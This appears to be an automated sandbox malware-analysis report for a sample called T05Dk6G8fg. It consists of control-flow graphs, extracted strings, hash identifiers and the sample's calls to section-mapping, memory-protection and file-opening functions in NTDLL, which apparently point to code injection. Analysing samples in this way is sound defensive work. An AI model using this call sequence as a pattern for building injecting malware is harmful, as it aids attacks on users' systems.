                                      control_flow_graph 6304 8189128-8189130 6305 8189132-8189141 6304->6305 6307 81891c5-81891d1 6305->6307 6308 8189147-8189154 call 8188ac8 6305->6308 6310 818921f-8189263 6307->6310 6311 81891d3-81891e2 6307->6311 6429 8189156 call 818afb8 6308->6429 6430 8189156 call 8189c50 6308->6430 6431 8189156 call 818a0e0 6308->6431 6432 8189156 call 81899d3 6308->6432 6315 81893d8-81893ec 6310->6315 6316 8189269-818927b 6310->6316 6311->6310 6313 81891e4-8189218 6311->6313 6313->6310 6324 8189409-818940d 6315->6324 6325 81893ee-8189407 6315->6325 6316->6315 6319 8189281-8189293 6316->6319 6317 818915c-8189177 6326 8189179-8189185 6317->6326 6327 8189187-8189198 6317->6327 6319->6315 6321 8189299-81892c1 6319->6321 6340 81892c6-81892d5 6321->6340 6328 8189412-8189422 6324->6328 6325->6324 6330 818919e-81891b8 6326->6330 6327->6330 6332 8189428-818944b 6328->6332 6333 8189997-818999c 6328->6333 6330->6305 6344 81891be-81891c2 6330->6344 6332->6333 6334 8189451-81894a3 call 8184840 6332->6334 6342 81899a1-81899a8 6333->6342 6350 81894a6-81894de call 8184840 6334->6350 6347 8189381-818938b 6340->6347 6351 81892da-81892e4 6347->6351 6352 8189391-81893a4 6347->6352 6356 8189583-8189587 6350->6356 6357 81894e4-818951a call 8184840 6350->6357 6360 81892fc-8189312 6351->6360 6361 81892e6-81892ec 6351->6361 6354 81893ab-81893ba 6352->6354 6368 81893bc 6354->6368 6369 81893c4 6354->6369 6356->6342 6362 818958d-818959e 6356->6362 6370 818951c-8189546 call 8184840 6357->6370 6374 8189318-818932a 6360->6374 6375 81893a6 6360->6375 6365 81892ee 6361->6365 6366 81892f0-81892f2 6361->6366 6362->6328 6367 81895a4-81895b3 6362->6367 6365->6360 6366->6360 6367->6333 6372 81895b9-81895de 6367->6372 6368->6369 6369->6315 6370->6328 6378 818954c-818957d call 8184840 6370->6378 6372->6342 6380 81895e4-81895f0 6372->6380 6374->6347 6383 818932c-8189360 6374->6383 6375->6354 6378->6356 6380->6350 6381 81895f6-8189605 6380->6381 6381->6333 6384 818960b-818962e 6381->6384 6383->6347 6388 8189362-8189370 6383->6388 6384->6342 6390 8189634-818964a 6384->6390 6388->6347 6389 8189372-818937a 6388->6389 6389->6347 6390->6333 6391 8189650-818966d 6390->6391 6391->6342 6393 8189673-818967c 6391->6393 6393->6357 6394 8189682-8189698 6393->6394 6394->6333 6395 818969e-81896c1 6394->6395 6395->6342 6397 81896c7-8189832 6395->6397 6433 8189838 call 2ebd750 6397->6433 6434 8189838 call 2ebde80 6397->6434 6409 818983d-818986e 6409->6333 6411 8189874-818989d 6409->6411 6411->6333 6412 81898a3-81898dc call 8187768 6411->6412 6415 81898e1-8189995 call 8186d58 call 8186da0 call 8186dc0 call 8186de0 call 8186e00 6412->6415 6415->6342 6429->6317 6430->6317 6431->6317 6432->6317 6433->6409 6434->6409
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 7->i$PH7r
                                      • API String ID: 0-3057951893
                                      • Opcode ID: f88391ce985813ca177971e4710a9589602f8dcc6f9d585e43dbf19ceed152a2
                                      • Instruction ID: a36efa3abcd03e2de88c894d81ada06ad389d0d74a3f6adeaa22e56268205aba
                                      • Opcode Fuzzy Hash: f88391ce985813ca177971e4710a9589602f8dcc6f9d585e43dbf19ceed152a2
                                      • Instruction Fuzzy Hash: CA32A276F00224CFCB54EB68C9959A9FBE6AF88314B15856DD809EB355DB31EC42CBC0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 6435 1528c98-1528cad 6436 1528cb4-1528d48 6435->6436 6442 1528d73-1528da9 6436->6442 6443 1528d4a-1528d4c 6436->6443 6450 15290a3-15290ac 6442->6450 6451 1528daf-1528dc0 6442->6451 6443->6442 6444 1528d4e-1528d6b 6443->6444 6444->6442 6450->6436 6452 15290b2-15290b9 6450->6452 6451->6436 6453 1528dc6-1528deb 6451->6453 6454 1528df1-1528e08 6453->6454 6455 1529047-152906f 6453->6455 6454->6453 6457 1528e0a-1528e7b 6454->6457 6455->6450 6456 1529071-152907f 6455->6456 6456->6457 6458 1529085-152909b 6456->6458 6457->6455 6459 1528e81-1528efc 6457->6459 6458->6450 6459->6451 6465 1528f02-1528f5e 6459->6465 6468 1529000-1529014 6465->6468 6468->6451 6469 152901a-152903a 6468->6469 6470 1528f63-1528fac 6469->6470 6471 1529040 6469->6471 6472 1528fb2-1528ff9 6470->6472 6473 15290ba-15290e9 6470->6473 6471->6455 6472->6468 6475 15290ec-15290fe 6473->6475 6476 1529104-1529116 6475->6476 6477 15293ac-15293b9 6475->6477 6478 1529119-152912c 6476->6478 6479 1529364-152937f 6477->6479 6480 15293bb-15293c1 6477->6480 6478->6475 6481 152912e 6478->6481 6483 1529133-152914a 6479->6483 6484 1529385 6479->6484 6482 15293c7-15293cd 6480->6482 6481->6479 6482->6476 6487 15293d3-15293e2 6482->6487 6485 1529150-15291cf 6483->6485 6486 1529417-152945c 6483->6486 6488 152938b-1529398 6484->6488 6489 15291d1-15291dd 6485->6489 6490 15291df-15291e9 6485->6490 6502 152945f-152947b 6486->6502 6491 15293e4-15293e6 6487->6491 6492 15293ea-15293ed 6487->6492 6488->6482 6493 152939a-15293a5 6488->6493 6489->6490 6494 1529219-1529232 6489->6494 6490->6488 6496 15291ef-15291fc 6490->6496 6497 15293f7 6491->6497 6498 15293e8 6491->6498 6492->6497 6501 15293ef-15293f6 6492->6501 6499 15293a7 6493->6499 6500 15293fc-1529410 6493->6500 6494->6475 6504 1529238-1529262 6494->6504 6496->6475 6503 1529202-1529214 6496->6503 6497->6500 6498->6501 6499->6475 6500->6486 6508 1529485-15294bd call 1528b60 6502->6508 6503->6488 6505 1529315-152932b 6504->6505 6506 1529268-1529281 6504->6506 6505->6475 6510 1529331-152935e 6505->6510 6506->6478 6509 1529287-15292c0 6506->6509 6508->6502 6518 15294bf-15294c6 6508->6518 6509->6505 6511 15292c2-1529307 6509->6511 6510->6479 6511->6475 6514 152930d-1529313 6511->6514 6514->6488
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,#$T!
                                      • API String ID: 0-530424339
                                      • Opcode ID: 7fe7190839c59c86d0989927d6b994a0f2c43836785bbd2276be5495480962b0
                                      • Instruction ID: dae453642dcc11866c7a16ae51db6217b49333b29b6b0db55dd1813b1242e585
                                      • Opcode Fuzzy Hash: 7fe7190839c59c86d0989927d6b994a0f2c43836785bbd2276be5495480962b0
                                      • Instruction Fuzzy Hash: CE327776E003298FCB14CFA9C9805DDBBF2BF99304B24826AE505BB391D735AD05CB64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: t5,$$7r
                                      • API String ID: 0-2502998861
                                      • Opcode ID: ec387de3f0bc8b216c732a167a0bb0621579e301f678b2f5c9d02ee465c1d6be
                                      • Instruction ID: 2133df02695bcb4bad99f84929cd3b9641f75aa96211843410e10d696afd1991
                                      • Opcode Fuzzy Hash: ec387de3f0bc8b216c732a167a0bb0621579e301f678b2f5c9d02ee465c1d6be
                                      • Instruction Fuzzy Hash: 0622D431F011149FC755DB68D994AAAF7E7AFC8300B19C469E90AEB345CA35EC02CBD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 748844491e5e4587f6f8106e9edca1fa34ccab6c7c265ecee233f69ba655c650
                                      • Instruction ID: d9f4ccaa88679e92aa0327c1746baa80017dcb835789941d7aa24f922f03732f
                                      • Opcode Fuzzy Hash: 748844491e5e4587f6f8106e9edca1fa34ccab6c7c265ecee233f69ba655c650
                                      • Instruction Fuzzy Hash: 2DE23A76A016198FCB54DF59CC84A99B7B3BFC8351F2A8299D409EB351D730AE86CF40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PH7r$$7r
                                      • API String ID: 0-2320954152
                                      • Opcode ID: 0c24888d705a7c2d2c7d8e7248db9fa2a414ff829824ea0b6f0b936c4ae859a3
                                      • Instruction ID: cb4206a7565ab72efd99b9fd9755d5be3074ef1447c019a9f1da42594fd322df
                                      • Opcode Fuzzy Hash: 0c24888d705a7c2d2c7d8e7248db9fa2a414ff829824ea0b6f0b936c4ae859a3
                                      • Instruction Fuzzy Hash: 2591DF31F002559FD794CB69D984A5AF7E2AF89310F19C56AE90DEB391DB31EC02CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Rv\9
                                      • API String ID: 0-1496815239
                                      • Opcode ID: 2b8e668d4f7400fb8c84d82d9c1f4d37cbb1211b054f6782735581ff016ea8c4
                                      • Instruction ID: cec5505b1beecaa44b92ebdb58179015b11fd3e76f13c89f4116747c1bf21d60
                                      • Opcode Fuzzy Hash: 2b8e668d4f7400fb8c84d82d9c1f4d37cbb1211b054f6782735581ff016ea8c4
                                      • Instruction Fuzzy Hash: 93620334E002199FCB49EFA4DAA469DBBB2FF89315F2085ADD046AB354CB355E81CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r
                                      • API String ID: 0-974610286
                                      • Opcode ID: 528b342d69fe5e84195ff4522fc28e202b2826b66189b563cfd0086e562248ae
                                      • Instruction ID: 476df39d97286eede773e84a114e9ef53630b71a173eaf07f684f346731e0fd3
                                      • Opcode Fuzzy Hash: 528b342d69fe5e84195ff4522fc28e202b2826b66189b563cfd0086e562248ae
                                      • Instruction Fuzzy Hash: 7F32A2357062418FC306DB25D995A56BBA2EFC6314B1AC4EAE449CF396CB35EC07CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Rv\9
                                      • API String ID: 0-1496815239
                                      • Opcode ID: 88b47b8896fb078519cbb45b04278b4f8ed9e6c928538247b266ea90514b5f9b
                                      • Instruction ID: a5ac51d0eb4bea006a6ae3585f572799203aa9bdac8a6f408ae252e3e97ef5f8
                                      • Opcode Fuzzy Hash: 88b47b8896fb078519cbb45b04278b4f8ed9e6c928538247b266ea90514b5f9b
                                      • Instruction Fuzzy Hash: 5E52E234E002199FCB59EFA4DAA469DBBB2FF89311F6085ADD006AB354CB355E81CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Rv\9
                                      • API String ID: 0-1496815239
                                      • Opcode ID: 9eb5eabead9edeedcb2578ca86b5225d74160200666069db2144fccbc56311b2
                                      • Instruction ID: d34e6d4083d502216a5ad1033501f6550871a254223498e54ad948a34282809c
                                      • Opcode Fuzzy Hash: 9eb5eabead9edeedcb2578ca86b5225d74160200666069db2144fccbc56311b2
                                      • Instruction Fuzzy Hash: 2152D234E002199FCB59EFA4DA9469DBBB2FF88315F6085ADD006AB354CB356E81CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 22=
                                      • API String ID: 0-1440949828
                                      • Opcode ID: 68064e4bd12a4e9dc9d978b6f42e64261a398393e5a5c6f257e09ed8b7088e6f
                                      • Instruction ID: c865e5afd33fd6db0045b211f51e43136f2e4b0789b8a16d02f6cb1704a36e1e
                                      • Opcode Fuzzy Hash: 68064e4bd12a4e9dc9d978b6f42e64261a398393e5a5c6f257e09ed8b7088e6f
                                      • Instruction Fuzzy Hash: 9E22C276F102248FD718DFA8C99499AF7B2AF98310B598569DC09EB344DB31ED06CBD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :@&D
                                      • API String ID: 0-2082950324
                                      • Opcode ID: bd74b13c83f133e1fb79198eb06f38a3a8af74786900b7a9f9bf8d06a3b82504
                                      • Instruction ID: 67506bd72d4bd0d8eb259748610144f45ed0e5a9aea7070e8dcde122cccc34f0
                                      • Opcode Fuzzy Hash: bd74b13c83f133e1fb79198eb06f38a3a8af74786900b7a9f9bf8d06a3b82504
                                      • Instruction Fuzzy Hash: C4129236F005298FCB54CF6DC98099DF7E2AB8831071A856AE909EB351E775ED46CBC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987922369.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8190000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K
                                      • API String ID: 0-2299363055
                                      • Opcode ID: 7206dfb2d51835ad761db28cea2be91e56a21b076d1e8ae9e262170096f4eb4b
                                      • Instruction ID: 58780412d4b12ada45e4cfc864fce8e25aa11d0d5ae73e5677736869b4315442
                                      • Opcode Fuzzy Hash: 7206dfb2d51835ad761db28cea2be91e56a21b076d1e8ae9e262170096f4eb4b
                                      • Instruction Fuzzy Hash: DC12AE35B012058FCB45CF69D9D0959FBE2AF89300729C6AAE449CB396DB71ED07CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 9>4,
                                      • API String ID: 0-190857145
                                      • Opcode ID: 1bd78c8ae1e1354fc627d76f3cfaec70adee4fcb3e850b6a096b5f244b6ebfdf
                                      • Instruction ID: 5aa3fa1e84a165edfdc552763ce4ca292c5a131a0a8c50c71f5f9a3b44fcde29
                                      • Opcode Fuzzy Hash: 1bd78c8ae1e1354fc627d76f3cfaec70adee4fcb3e850b6a096b5f244b6ebfdf
                                      • Instruction Fuzzy Hash: 4CF18F76F002298FDB18DFA9C8D06ADB7F2BF89204B158169D509EF395EB749D05CB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :,D
                                      • API String ID: 0-4270504621
                                      • Opcode ID: e2a1f37164e1eaca1cdbd1c06bd18117582d4b5855ffcea6c9ba9ebc815cf1bf
                                      • Instruction ID: 7b14449917fea0ebd5236523e68e4354e84b55f8a409ec39813e90fd14425ed0
                                      • Opcode Fuzzy Hash: e2a1f37164e1eaca1cdbd1c06bd18117582d4b5855ffcea6c9ba9ebc815cf1bf
                                      • Instruction Fuzzy Hash: 70F1C676F102298FCB14DF68D99469DB7F2AF88210F4986AAD809FB341DB309D45CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 7->i
                                      • API String ID: 0-159778870
                                      • Opcode ID: b97005b69b12d8b07d18e5cbc57ecd2f1c0b69a0c023c444a10da44b5607d1f1
                                      • Instruction ID: 926b80e0f4960bd19d62a6b98da9a0bf352cdeecd9928e910fd51c49855fb96c
                                      • Opcode Fuzzy Hash: b97005b69b12d8b07d18e5cbc57ecd2f1c0b69a0c023c444a10da44b5607d1f1
                                      • Instruction Fuzzy Hash: 86F1A376F102288FCB54DF68C99199AF7A6AF98314716866DD809EB345DB31EC02CFC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 7->i
                                      • API String ID: 0-159778870
                                      • Opcode ID: ce9b04d966c13dc3951c0550cff34c67cdcc2e5ab2e0ec81990f4cf2a8bfa6b7
                                      • Instruction ID: d1ad33fb3531ccf6084fa23d7f6f502953aaf5134e7c64ab51aeca8e40f2f608
                                      • Opcode Fuzzy Hash: ce9b04d966c13dc3951c0550cff34c67cdcc2e5ab2e0ec81990f4cf2a8bfa6b7
                                      • Instruction Fuzzy Hash: 4AE1A476F102288FCB54DF68C991959F7A6AF98314716866DD809EB345DB35EC02CFC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :,D
                                      • API String ID: 0-4270504621
                                      • Opcode ID: 308bac8d06431948c588711b645cf55cdc8bca47ee695b43e72ce58b373bfe4c
                                      • Instruction ID: f35f49c7d098682557b8339d58e8180b196cf5d88febaa12b435346a7662181c
                                      • Opcode Fuzzy Hash: 308bac8d06431948c588711b645cf55cdc8bca47ee695b43e72ce58b373bfe4c
                                      • Instruction Fuzzy Hash: 6BE19676F002398FC725DF29C981699B7E2AF88310F4686EAD809EB355D7749D81CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 22=
                                      • API String ID: 0-1440949828
                                      • Opcode ID: f3324e936822e31397c09c5c9e85239f7d73b1072909acd3554ae8837696d740
                                      • Instruction ID: f6844565ad39e6f889beaa8c067bb27d73e6ad2049dbdd4dd1279d5a1b99b9c2
                                      • Opcode Fuzzy Hash: f3324e936822e31397c09c5c9e85239f7d73b1072909acd3554ae8837696d740
                                      • Instruction Fuzzy Hash: 9CE1A076F101248FDB58DFA8C99499AB7B6AF983107598169D809EB348DB30ED06CBC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 7} x
                                      • API String ID: 0-3687528875
                                      • Opcode ID: 63e0feb8b809957a380f612fcbae5a77e5fed6f4c465db921a7179812ca6368e
                                      • Instruction ID: 391520579ab8808b757ad11789b57bbdf175d9b14a81709fac384b6a58b32b76
                                      • Opcode Fuzzy Hash: 63e0feb8b809957a380f612fcbae5a77e5fed6f4c465db921a7179812ca6368e
                                      • Instruction Fuzzy Hash: 51C11536F002258FCB05DFA8C8945AEBBB2AF85214B1985AADD05EB361DB359C01CBD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :,D
                                      • API String ID: 0-4270504621
                                      • Opcode ID: 671fb47f2a11183e08902cecdde25bc709469febfa20c9850b1a7fb2f8e7fd24
                                      • Instruction ID: 5a466caa43a98737f2a88fd5a7e3cb4881db9e964d661b770ab2c3bde397fcae
                                      • Opcode Fuzzy Hash: 671fb47f2a11183e08902cecdde25bc709469febfa20c9850b1a7fb2f8e7fd24
                                      • Instruction Fuzzy Hash: 1FE19276E002298FC725DF69C8916D9B7B2AF88310F4985EAD84DEB305DB749D81CF90
                                      APIs
                                      • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 02EB4DBE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: 4f26ccf6098a65cb1ec40dfb7cb8f8a8afd0cd69ede4079eca2864e05953ba8d
                                      • Instruction ID: 7ef8065a0b517d4a7236cb6dc86197a06f159fb82d56ea28436dded5e8ad4e7d
                                      • Opcode Fuzzy Hash: 4f26ccf6098a65cb1ec40dfb7cb8f8a8afd0cd69ede4079eca2864e05953ba8d
                                      • Instruction Fuzzy Hash: A531F175901208AFDF01DFA9D984ADEBFF5BF4C224F14852AE918A3220C7759950CFA0
                                      APIs
                                      • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 02EB4DBE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: 196108fc1a425307a803824c66be66e5d6bd52cf1568e009356d6704a98aa548
                                      • Instruction ID: 965d003d0b6abbb91f43586603ac499b682beffd6239925c06ceccb906b1f594
                                      • Opcode Fuzzy Hash: 196108fc1a425307a803824c66be66e5d6bd52cf1568e009356d6704a98aa548
                                      • Instruction Fuzzy Hash: DA31E075900208AFDF11DFA9D984ADEBBF6FF4C324F14851AE918A3250D7759950CFA0
                                      APIs
                                      • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 02EB4B29
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: FileOpen
                                      • String ID:
                                      • API String ID: 2669468079-0
                                      • Opcode ID: a6b4d0cfe07334b924f33279e16309a22d6a68c3da876efecee4f9131691ad80
                                      • Instruction ID: 982888b6590a7406fdf770132d13c67152a774b02a9d80a0c7009075415c20e7
                                      • Opcode Fuzzy Hash: a6b4d0cfe07334b924f33279e16309a22d6a68c3da876efecee4f9131691ad80
                                      • Instruction Fuzzy Hash: 152122B5D01219AFCB01DFAAD984BDEFBB5FF48310F10852AE918A7240C7759A10CBA0
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EB4709
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: 6ec05f3bff2dc3fa74774a19bcfc6ab419434a18b695781986eaad665f6b4459
                                      • Instruction ID: 351a93a460b75c7fbcf5131305e537f0b2b08cef600591945bb0fbe933049fe6
                                      • Opcode Fuzzy Hash: 6ec05f3bff2dc3fa74774a19bcfc6ab419434a18b695781986eaad665f6b4459
                                      • Instruction Fuzzy Hash: 8F21F2B1D013499FDB11CFAAD984ADEFBF5FF48310F20842AE919A7651D7759900CBA0
                                      APIs
                                      • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 02EB4C04
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: CreateSection
                                      • String ID:
                                      • API String ID: 2449625523-0
                                      • Opcode ID: 301b2286a1d7fb320809ece5b68dafef6088fdcb6acf1d653b45c58283089874
                                      • Instruction ID: be08ad6dfabf7f8bad8e066bbce9b005f7174d55cbbbaac50aeeb080911353c7
                                      • Opcode Fuzzy Hash: 301b2286a1d7fb320809ece5b68dafef6088fdcb6acf1d653b45c58283089874
                                      • Instruction Fuzzy Hash: 4C21F2B1D01219AFDB01DFAAD984ADEFBB5FF48310F10852AE918A3240D7759A50CFE0
                                      APIs
                                      • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 02EB4C04
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: CreateSection
                                      • String ID:
                                      • API String ID: 2449625523-0
                                      • Opcode ID: 1845d870f605b686c23d3847032fb1dfe49b008538371db488dace5f8f7f4c25
                                      • Instruction ID: 37a75dea1dad268628c53f425a0876a7e48e78a57b42cca5b27bc1c4e1a0271e
                                      • Opcode Fuzzy Hash: 1845d870f605b686c23d3847032fb1dfe49b008538371db488dace5f8f7f4c25
                                      • Instruction Fuzzy Hash: AA21F2B1D01219AFDB01CFA9D984BEEFBB5BF48310F10852AE518A7640D7759A50CFA0
                                      APIs
                                      • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 02EB4B29
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID: FileOpen
                                      • String ID:
                                      • API String ID: 2669468079-0
                                      • Opcode ID: 607c50b7fdb7260882fa6834e5f0a743f1568baceefb97b686ebb69a87141c98
                                      • Instruction ID: f23f8c18edfbab9e603405f875b16ed1ab02e163428920a45e5c6eb1f343cc6b
                                      • Opcode Fuzzy Hash: 607c50b7fdb7260882fa6834e5f0a743f1568baceefb97b686ebb69a87141c98
                                      • Instruction Fuzzy Hash: 5021E3B1D01219ABDB00DFAAD984ADEFBB5FF48310F10852AE518A7240D7759A54CBA0
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EB4709
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
